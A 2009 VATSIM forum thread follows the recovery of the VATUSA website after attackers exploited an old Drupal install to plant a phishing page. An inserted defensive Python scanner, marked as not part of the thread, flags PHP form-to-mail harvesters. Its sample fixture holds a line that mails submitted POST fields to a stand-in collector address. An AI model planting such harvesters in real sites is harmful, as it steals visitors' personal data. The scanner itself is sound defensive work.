Andrew Podner 994055
Posted May 30, 2009 at 02:19 PM

Hello All,

Magically, the VATUSA website has been shut down within the last 30 minutes. Why this happened when there is not an account issue is anyone's guess. We are working quickly to get the issue resolved, and find out who or what caused the issue to begin with. I will post details as to the status of this issue regularly in this thread.

Thanks
Andrew Podner
Division Director VATUSA

Andrew Podner 994055 (Author)
Posted May 30, 2009 at 03:10 PM

According to the webhost: "It appears a phishing site has been placed into your site files."

So we know that the reason the site is down is malicious. We are continuing to work toward resolution.

More to follow

Andrew Podner
Division Director VATUSA

Colin Zhang 1103737
Posted May 30, 2009 at 03:27 PM

Could this be linked to this problem on the QualityWings site?

viewtopic.php?f=6&t=40538

Speculation on that thread says widespread attack either together with or from information gathered from the avsim hack. I'm quite skeptical but anything's possible...

VATUSA ZSE Staff Mentor, S3

Andrew Podner 994055 (Author)
Posted May 30, 2009 at 03:34 PM

No it is not, I have been informed as to the root cause and we are working closely with the webhost to restore services

Andrew Podner
Division Director VATUSA

Colin Zhang 1103737
Posted May 30, 2009 at 03:40 PM

Great, nice job with the swift responses and action!

VATUSA ZSE Staff Mentor, S3

Andrew Podner 994055 (Author)
Posted May 30, 2009 at 04:55 PM

Just an update:

We are isolating the potential vulnerabilities in the website that have been in there for quite some time. The site is then going to be backed up and then all installed software will be updated. This means that there is a chance that some or all of the existing site will be in disrepair once we have a restoration of service.

I am actually anticipating that the site will be non-functional after restoration of service due to the fact that several of the systems in use are outdated and with the security holes closed, they simply won't work. As such I am concurrently writing a new CSS based portal type site based on a site that I wrote earlier this year. One way or another, VATUSA will have a functioning public website online very soon, and we will perform a damage assessment to figure out what remains to be repaired.

Thank you for your patience

Andrew Podner
Division Director VATUSA

Andrew Podner 994055 (Author)
Posted May 30, 2009 at 05:38 PM

12:30pm CDT update:

The backup and update process for all VATUSA related items is complete. There are a couple of other systems not under our control that are being worked out, and that will hopefully not take too long. Once this is complete, we will have a restoration of service and can begin assessing the damage.

Development of a replacement site in the event that our public site is non-functional is continuing.

Contingency plans for post restoration failures of the Cert Center, Staff, Instructor, Forums, and other systems are in process and ongoing.

Thanks for your continued patience

Andrew Podner
Division Director VATUSA

Tyler Walton 1055592
Posted May 30, 2009 at 06:03 PM

Lovely first day on the job for you eh Andrew. Grats on the new job btw.

Just so you guys know if the new site is what I think it's going to be, it'll rock. We've seen his work out here at ZME and he's done a fantastic job on our website.

_________
Tyler Walton (C1) -Facility Manager vZME
Tyler Walton - (C1) -vZKC Facility Engineer

Tyler Walton 1055592
Posted May 30, 2009 at 06:09 PM

> According to the webhost: "It appears a phishing site has been placed into your site files."
> So we know that the reason the site is down is malicious. We are continuing to work toward resolution.
> More to follow

Slight concern here, has any of our passwords or information been compromised by the phishing site?

____________________
Tyler Walton (C1) -Facility Manager vZME
Tyler Walton - (C1) -vZKC Facility Engineer

Andrew Podner 994055 (Author)
Posted May 30, 2009 at 06:17 PM

I cannot say with any certainty until service is restored. At this time, we do not have any evidence that database information was compromised.

Andrew Podner
Division Director VATUSA

Andrew Podner 994055 (Author)
Posted May 30, 2009 at 06:33 PM

1:30pm CDT Update:

I have regained access to the files on the web server and found a malicious file impersonating a credit card company in an unused directory of the website. It DOES NOT connect to the VATUSA database, and there is no reason at this time to believe that our data has been compromised.

Restoration efforts are ongoing.

More to Follow

Andrew Podner
Division Director VATUSA

Philippe Hewett 1008468
Posted May 30, 2009 at 06:42 PM

The LUA is still going to take place... right?

Andrew Podner 994055 (Author)
Posted May 30, 2009 at 07:06 PM

Absolutely, VATSIM network operations for LUA will continue as planned

Andrew Podner
Division Director VATUSA

Philippe Hewett 1008468
Posted May 30, 2009 at 07:28 PM

> Absolutely, VATSIM network operations for LUA will continue as planned

Good to hear, can't wait! Too bad I can't access my route anymore though.. oh well.

Andrew Podner 994055 (Author)
Posted May 30, 2009 at 07:41 PM

2:30pm CDT update

We believe that all problem code has been cleared up. Our web server contained an old Drupal installation that was vulnerable and it was exploited. The hacker placed files impersonating a site that collects personal data and emailed it to him/her. We have isolated and removed both the problem files and the old Drupal installation.

We are working with the webhost for them to check it over and clear the server for reactivation.

Replacement site development and other contingency planning are ongoing.

More to follow

Andrew Podner
Division Director VATUSA

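An added example, not part of the original thread and not VATUSA's or the webhost's tooling: a triage pass over a web root for the pattern described in the update above, PHP files that read submitted form fields and email them out, with files outside the maintained directories marked as the stronger lead. The directory names, the `expected_dirs` allow-list and the sample files are constructed assumptions.

```python
import os
import re
import tempfile

PHP_EXT = (".php", ".phtml", ".inc")
READS_FORM = re.compile(r"\$_(POST|REQUEST|GET)\b")
# Bare mail( call; the lookbehind skips $obj->mail( and send_mail(.
SENDS_MAIL = re.compile(r"(?<![\w>$])mail\s*\(", re.IGNORECASE)

def find_mail_harvesters(webroot, expected_dirs):
    """Return sorted (relative_path, in_expected_dir) for PHP files that
    both read submitted form fields and call mail()."""
    hits = []
    for dirpath, _dirs, files in os.walk(webroot):
        for name in files:
            if not name.lower().endswith(PHP_EXT):
                continue
            full = os.path.join(dirpath, name)
            with open(full, "r", errors="replace") as fh:
                text = fh.read()
            if READS_FORM.search(text) and SENDS_MAIL.search(text):
                rel = os.path.relpath(full, webroot).replace(os.sep, "/")
                top = rel.split("/", 1)[0] if "/" in rel else ""
                hits.append((rel, top in expected_dirs))
    return sorted(hits)

def build_sample_tree(root):
    """Constructed sample web root (assumption, not VATUSA's layout)."""
    samples = {
        "www/contact.php": "<?php mail($admin, 'Contact', $_POST['msg']); ?>",
        "www/index.php": "<?php echo $_GET['page']; ?>",
        "old_site/secure/form.php":
            "<?php $d = $_POST['f1'] . $_POST['f2'];\n"
            "mail('collector@example.invalid', 'x', $d); ?>",
    }
    for rel, body in samples.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(body)

def demo():
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        return find_mail_harvesters(root, expected_dirs={"www"})

if __name__ == "__main__":
    for rel, expected in demo():
        print("review " if expected else "SUSPECT", rel)
```

A legitimate contact form matches the same heuristic, so hits inside maintained directories are review items rather than findings; the unmaintained-directory hit is the one to pull first.
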
Philippe Hewett 1008468
Posted May 30, 2009 at 07:48 PM

Any chance the LUA page is back up by 23:00Z? I would need to check my callsign and route...

Andrew Podner 994055 (Author)
Posted May 30, 2009 at 08:00 PM

We are doing everything possible to make that happen. I expect that we will know something in an hour or so.

Andrew Podner
Division Director VATUSA

Philippe Hewett 1008468
Posted May 30, 2009 at 08:54 PM

Good job, seems back up!!

Andrew Podner 994055 (Author)
Posted May 30, 2009 at 09:03 PM

4:00pm Final Update in this Forum

Web services are restored, we are assessing each system individually. Further updates will be posted in the VATUSA.net forums

Thanks to everyone for your patience and especially to Kyle Ramsey and Dave Klain for their assistance today.

Andrew Podner
Division Director VATUSA

Alex Bailey 969331
Posted May 30, 2009 at 09:08 PM

Those of you who had email addresses with us (CTP staff, etc.), you may have lost those accounts. We will be working to fill those gaps and make sure everything is returned to normal as soon as possible.

Alex Bailey
ZMA I-1

Harold Rutila 974112
Posted June 2, 2009 at 12:57 AM

You have got to be kidding me... I really hope all that work didn't go to waste.

SUSPENDED

Kyle Steever 810905
Posted June 2, 2009 at 01:06 AM

The situation is being resolved at this time. We'll have things fixed shortly...

vZME Air Traffic Manager
... --- ... ... --- ...

Ricardo Sosa 979914
Posted June 9, 2009 at 12:03 AM

The website continues to display the "Account Suspended" message, even though I know the website works now. I've cleared my cookies and cache and it still doesn't display. I can only open it if I use a proxy. Any suggestions? I've tried it on both IE and Firefox.

vZTL Events Director

Ryan Flynn 939022
Posted June 9, 2009 at 03:28 PM

It's probably a DNS problem on your ISP's end. They usually resolve within a few days. In the meantime, try this:

http://67.220.195.100/~vatusai/www/public.php?mod=phome

That's the VATUSA's server IP. I just did a "ping" for it. My host is set up the same way. http://www.ualva.org can be accessed at:

http://web48.justhost.com/~ualvaor1/
http://65.60.9.26/~ualvaor1/

Ryan Flynn
Southwest Virtual Airlines
www.swavirtual.com

Ricardo Sosa 979914
Posted June 10, 2009 at 05:01 AM

That opens the main page. I click on anything on it without getting the "Account Suspended" message again. It's been about a week now. How many is a few days?

On the VATUSA forums (got in with a proxy) they suggested a DNS flush. Did that and it worked the first time, by only opening the main page. After clicking on anything, it would go to the same message again. Ran it the second time, and now I'm back to square one. Not even the main page opens. Any other ideas?

vZTL Events Director